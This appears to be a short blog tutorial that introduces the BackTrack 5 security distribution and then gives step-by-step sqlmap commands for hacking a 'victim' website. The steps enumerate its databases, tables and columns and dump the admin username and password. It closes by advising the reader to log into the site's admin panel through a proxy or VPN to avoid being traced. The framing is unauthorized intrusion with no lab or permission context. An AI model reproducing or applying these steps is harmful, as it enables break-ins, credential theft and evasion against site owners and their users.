What is backtrack ?
Backtrack is Ubuntu based operating system. Backtrack is the best operating system for the security professionals and hackers. There are lots of inbuilt tools in the backtrack 5 like sqlmap , metasploit , Information gathering, maintaining access , Backdooring etc.How can I download Backtrack ?
well you can download the Backtrack 5 at here.
Select the version of the OS I recommend Backtrack 5 R2 (because its latest version).
How to install the backtrack ?
You can install it using making a flash drive or burning the DVD. I recommend make a flash drive and install it. (create flash drive of backtrack)
What to do after installing ?
The default id and password of this operating system is
root and toor so after installing backtrack restart your computer and add this id and password.
Now if you want to use the GUI then simply type “Startx” to enter in the GUI of backtrack 5.
Follow the simple steps to hack website using backtrack 5 sqlmap tool.
1. Open your backtrack terminal and type cd /pentest/database/sqlmap and hit enter. Now sqlmap is open in your terminal
2. Now find the vulnerable site. (well I already have vulnerable site)
3. Now type this command in the terminal and hit enter.(refer above figure)
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 –dbs
4. Now you will get the database name of the website
Well I got the two database aj and information_schema we will select aj database.
5. Now get the tables of that database. for that you need to enter this command into your terminal and simply hit Enter.
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D (database name) –tables
6. Now we need to grab the tables from the aj database. paste this command bellow command and hit enter.
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables
7. Now you will get the tables list which is stored in aj database.
8. Now lets grab the columns from the admin table
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns
Now we got the columns and we got username and password
9. Now lets grab the passwords of the admin
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dumpNow we got the username and the password of the website !
Now just find the admin penal of the website and use proxy/vpn when you are trying to login in the website as a admin.
Source : Hack For Security
No comments:
Post a Comment